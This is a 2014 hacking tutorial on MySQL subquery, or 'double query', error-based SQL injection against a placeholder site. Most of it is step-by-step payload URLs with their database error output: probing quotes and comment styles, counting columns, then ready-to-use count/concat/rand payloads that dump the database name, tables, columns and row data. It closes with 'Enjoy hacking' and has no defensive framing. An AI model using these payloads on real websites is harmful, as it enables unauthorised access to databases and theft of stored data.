After discussing the Basic Injections, Union Based Injection, XPATH injection using Extractvalue and XPATH injection using UpdateXML now we can move to Sub Query injection.

Its Scenario is very same to XPATH. Then you may think why should we use this one why not XPATH when that one is easier then this one?


Well the answer is just in front of you that XPATH is not available in some versions of MySQL and may be filtered or locked by admin thats why to overcome this problem we will use Sub Query Injection.

Lets us start from Testing the Website.


www.vuln-web.com/photo.php?id=1/
No Error
www.vuln-web.com/photo.php?id=1" No Error
www.vuln-web.com/photo.php?id=1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Now this time let us Deeply inspect the Error as we can see the error is
''1'' LIMIT 0,1'

Single Quote on both of the sides are used by the SQL itself to quote the part of Query which have error. That means
'1'' LIMIT 0,1

is a part of Query. Now we can see our input there which was 1' which created the error because we entered one single quote and the web application also added one single quote by its own. So we have to comment out the rest query to stop that error from occurring. For that first we have to imagine what the query can be:

Assumed Query according to the error:
select field1,field2 from table1 where id='<our_input_here>' LIMIT 0,1;

Now Let us try Commenting out the rest of Query part using out Comment Types.

www.vuln-web.com/photo.php?id=1'--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
www.vuln-web.com/photo.php?id=1'# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
www.vuln-web.com/photo.php?id=1'/* You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' LIMIT 0,1' at line 1
www.vuln-web.com/photo.php?id=1'-- - No Error

So the comment operator working in this Query is '-- -' so now as we have commented lets test if the injection is successfully working or not. For that we will use AND operator boolean to know.

Assumed Query according to the error with out input:
select field1,field2 from table1 where id='1' and true-- -' LIMIT 0,1;


we injected 1' and true-- so anything after -- - don't includes in the query so our query actually is

select field1,field2 from table1 where id='1' and true;


Here both of the conditions are true so you must get page normally as it was returning earlier in the starting. Now we will inject false and try if its making any error.

select field1,field2 from table1 where id='1' and false;

This time the page wont load normally. It wont through any error but you wont see the normal page which loaded earlier with true. That means the injection is working.

Now from the injection Point of View

www.vuln-web.com/photo.php?id=1' and true-- -
Normal Page
www.vuln-web.com/photo.php?id=1' and false-- - Page din't Load As normally it do as the query dint returned anything.

Now lets start finding out the number of columns.

www.vuln-web.com/photo.php?id=1' order by 1-- -
No Error
www.vuln-web.com/photo.php?id=1' order by 1,2-- - No Error
www.vuln-web.com/photo.php?id=1' order by 1,2,3-- - No Error
www.vuln-web.com/photo.php?id=1' order by 1,2,3,4-- - Error : Unknown column '4' in 'order clause'

So the last Column which worked without Error is 3rd. So We have 3 columns. First lets try Union Based Injection.

www.vuln-web.com/photo.php?id=-1' union select 1,2,3-- -

Remember to invalidate the first input as i did by making it -1, you can use other ways discussed earlier to invalidate the first query so that it wont give any output and output of our injected query will get printed. But still the Application din't printed any of the number on the page, that means its not outputting any thing. In that case we can use XPATH Injection using UpdateXML or XPATH Injection using ExtractValue also but there are some versions of SQL which don't have that function or admin have disabled these functions. So in that case we Will use Sub Query or so called Double Query injection.

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((<Your Query here to return single row>),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x)-- -

You will get out put in form of Error like

Duplicate entry '<Your Output here>:1' for key 'group_key'

We can start our Injection by getting the Current database and then the tables and then the columns and then dumping data.

If you have properly read the Death row Injection i can bet you must be able to figure out the rest part by your own. Still i will show you the Injection Sequence required.

Getting Database:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Getting the Tables:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Getting the Columns of any table:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name='<table_name_here>' limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Getting the Data from Columns:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select concat(<column_1>,<column_2>) from <table_name_here> limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Well we are done...
Enjoy hacking.

Author : Zenodermus Javanicus
Date : 2014-03-23